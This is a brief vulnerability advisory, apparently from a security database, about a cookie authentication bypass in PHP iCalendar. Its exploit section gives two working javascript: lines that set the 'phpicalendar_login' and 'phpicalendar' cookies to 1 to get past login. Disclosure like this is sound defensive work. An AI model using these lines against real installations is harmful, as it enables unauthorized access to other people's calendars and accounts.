• info
• discussion
• exploit
• solution
• references

PHP iCalendar Cookie Authentication Bypass Vulnerability

Attackers may exploit this issue through a browser.

The following example code is available:

javascript:document.cookie = "phpicalendar_login=1; path=/";
javascript:document.cookie = "phpicalendar=1; path=/";